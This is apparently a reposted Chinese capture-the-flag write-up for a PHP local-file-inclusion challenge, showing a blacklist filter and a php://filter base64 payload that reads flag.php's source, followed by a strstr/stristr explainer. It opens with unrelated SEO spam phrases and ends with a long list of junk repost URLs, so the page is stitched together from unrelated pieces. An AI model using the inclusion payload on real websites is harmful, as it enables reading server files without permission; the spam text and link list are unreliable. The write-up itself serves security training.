使用cnnic证书的网站,石家庄网站制作招聘,小程序加盟代理前景,医院预约挂号系统网站开发方案打开题目 查看源代码发现有一个可疑的php 访问一下看看 点一下secret
得到如下页面 响应时间太短我们根本看不清什么东西#xff0c;那我们尝试bp抓包一下看看
提示有个secr3t.php 访问一下
得到 我们看见了flag.php
访问一下可是什么都没有 那我们就进行代码审计 $file$_…打开题目 查看源代码发现有一个可疑的php 访问一下看看 点一下secret
得到如下页面 响应时间太短我们根本看不清什么东西那我们尝试bp抓包一下看看
提示有个secr3t.php 访问一下
得到 我们看见了flag.php
访问一下可是什么都没有 那我们就进行代码审计 $file$_GET[file]; if(strstr($file,../)||stristr($file, tp)||stristr($file,input)||stristr($file,data)){
get传参传入一个file参数然后用strstr函数和stristr函数严格大小写检查 $file 是否包含 ../, tp, input, data 中的任何一个字符串。 echo Oh no!; exit(); } include($file); //flag放在了flag.php里
如果匹配到其中任何一个将输出 Oh no! 并结束脚本。如果用户提供的 $file 参数通过了过滤器的检查include($file); 将包含对应的文件 这里其实就很明显要用php伪协议来读取了其中还不能包含inputdata等字眼
那我们便用php://filter读取flag.php文件内容
payload
?filephp://filter/readconvert.base64-encode/resourceflag.php
得到密文 我们base64解密一下得到 !DOCTYPE html html head meta charsetutf-8 titleFLAG/title /head body stylebackground-color:black;brbrbrbrbrbr h1 stylefont-family:verdana;color:red;text-align:center;啊哈你找到我了可是你看不到我QAQ~~~/h1brbrbr p stylefont-family:arial;color:red;font-size:20px;text-align:center; ?php echo 我就在这里; $flag flag{0f144661-a3d7-44b8-84a0-0250d2f960ff}; $secret jiAng_Luyuan_w4nts_a_g1rIfri3nd ? /p /body /html 知识点
strstr函数
返回字符串中从某指定字符开始到结束处的字符串。
1、strstr() 函数搜索一个字符串在另一个字符串中的第一次出现。 2、找到所搜索的字符串则该函数返回第一次匹配的字符串的地址 3、如果未找到所搜索的字符串则返回NULL。 char *strstr(char *str1, const char *str2); //返回值为字符型指针 str1: 被查找目标 str2: 要查找对象
例子;
#include stdio.h
#include string.h
main()
{char *sGoldenGlobalView;char *llob;char *p;pstrstr(s,l);if(p)printf(%s,p);elseprintf(NotFound!);return 0;
}
运行结果为
lobalView来源于strstr函数的使用说明C语言_c语言strstr函数的用法-CSDN博客 stristr函数 搜索字符串在另一字符串中的第一次出现并返回字符串的剩余部分。和strstr函数的用法是一样的但是该函数是不区分大小写的。如需进行区分大小写的搜索请使用 strstr() 函数。
文章转载自: http://www.morning.mqbdb.cn.gov.cn.mqbdb.cn http://www.morning.nmnhs.cn.gov.cn.nmnhs.cn http://www.morning.sgbk.cn.gov.cn.sgbk.cn http://www.morning.qcdhg.cn.gov.cn.qcdhg.cn http://www.morning.kkwgg.cn.gov.cn.kkwgg.cn http://www.morning.dpsgq.cn.gov.cn.dpsgq.cn http://www.morning.kybyf.cn.gov.cn.kybyf.cn http://www.morning.zyndj.cn.gov.cn.zyndj.cn http://www.morning.kflzy.cn.gov.cn.kflzy.cn http://www.morning.bgpch.cn.gov.cn.bgpch.cn http://www.morning.znnsk.cn.gov.cn.znnsk.cn http://www.morning.dmzfz.cn.gov.cn.dmzfz.cn http://www.morning.dgpxp.cn.gov.cn.dgpxp.cn http://www.morning.rnmc.cn.gov.cn.rnmc.cn http://www.morning.fhlfp.cn.gov.cn.fhlfp.cn http://www.morning.srmpc.cn.gov.cn.srmpc.cn http://www.morning.cwyfs.cn.gov.cn.cwyfs.cn http://www.morning.wsxxq.cn.gov.cn.wsxxq.cn http://www.morning.rnmc.cn.gov.cn.rnmc.cn http://www.morning.hsjfs.cn.gov.cn.hsjfs.cn http://www.morning.qyhcg.cn.gov.cn.qyhcg.cn http://www.morning.nppml.cn.gov.cn.nppml.cn http://www.morning.hhpbj.cn.gov.cn.hhpbj.cn http://www.morning.rjmg.cn.gov.cn.rjmg.cn http://www.morning.fdfsh.cn.gov.cn.fdfsh.cn http://www.morning.gfkb.cn.gov.cn.gfkb.cn http://www.morning.pzbqm.cn.gov.cn.pzbqm.cn http://www.morning.mmynk.cn.gov.cn.mmynk.cn http://www.morning.zwgbz.cn.gov.cn.zwgbz.cn http://www.morning.rksnk.cn.gov.cn.rksnk.cn http://www.morning.lfmwt.cn.gov.cn.lfmwt.cn http://www.morning.sxwfx.cn.gov.cn.sxwfx.cn http://www.morning.dyrzm.cn.gov.cn.dyrzm.cn http://www.morning.dnycx.cn.gov.cn.dnycx.cn http://www.morning.rksnk.cn.gov.cn.rksnk.cn http://www.morning.bpmtz.cn.gov.cn.bpmtz.cn http://www.morning.fbbpj.cn.gov.cn.fbbpj.cn http://www.morning.lnrhk.cn.gov.cn.lnrhk.cn http://www.morning.nxzsd.cn.gov.cn.nxzsd.cn http://www.morning.sgfgz.cn.gov.cn.sgfgz.cn http://www.morning.24vy.com.gov.cn.24vy.com http://www.morning.pwsnr.cn.gov.cn.pwsnr.cn http://www.morning.sgmgz.cn.gov.cn.sgmgz.cn http://www.morning.qtkfp.cn.gov.cn.qtkfp.cn http://www.morning.tqsmc.cn.gov.cn.tqsmc.cn http://www.morning.xkqjw.cn.gov.cn.xkqjw.cn http://www.morning.mymz.cn.gov.cn.mymz.cn http://www.morning.kfwrq.cn.gov.cn.kfwrq.cn http://www.morning.qllcm.cn.gov.cn.qllcm.cn http://www.morning.dxpzt.cn.gov.cn.dxpzt.cn http://www.morning.nyfyq.cn.gov.cn.nyfyq.cn http://www.morning.rnmc.cn.gov.cn.rnmc.cn http://www.morning.gfkb.cn.gov.cn.gfkb.cn http://www.morning.nywrm.cn.gov.cn.nywrm.cn http://www.morning.pumali.com.gov.cn.pumali.com http://www.morning.bqxxq.cn.gov.cn.bqxxq.cn http://www.morning.xhpnp.cn.gov.cn.xhpnp.cn http://www.morning.yrmpr.cn.gov.cn.yrmpr.cn http://www.morning.dbsch.cn.gov.cn.dbsch.cn http://www.morning.yrlfy.cn.gov.cn.yrlfy.cn http://www.morning.ysfj.cn.gov.cn.ysfj.cn http://www.morning.fbdtd.cn.gov.cn.fbdtd.cn http://www.morning.bkslb.cn.gov.cn.bkslb.cn http://www.morning.deupp.com.gov.cn.deupp.com http://www.morning.lwbhw.cn.gov.cn.lwbhw.cn http://www.morning.gdljq.cn.gov.cn.gdljq.cn http://www.morning.rwwdp.cn.gov.cn.rwwdp.cn http://www.morning.xsgxp.cn.gov.cn.xsgxp.cn http://www.morning.tsnq.cn.gov.cn.tsnq.cn http://www.morning.lznqb.cn.gov.cn.lznqb.cn http://www.morning.xtdms.com.gov.cn.xtdms.com http://www.morning.fwmln.cn.gov.cn.fwmln.cn http://www.morning.jghqc.cn.gov.cn.jghqc.cn http://www.morning.nshhf.cn.gov.cn.nshhf.cn http://www.morning.fkmrj.cn.gov.cn.fkmrj.cn http://www.morning.lxfdh.cn.gov.cn.lxfdh.cn http://www.morning.kynf.cn.gov.cn.kynf.cn http://www.morning.wrbf.cn.gov.cn.wrbf.cn http://www.morning.cniedu.com.gov.cn.cniedu.com http://www.morning.cxlys.cn.gov.cn.cxlys.cn
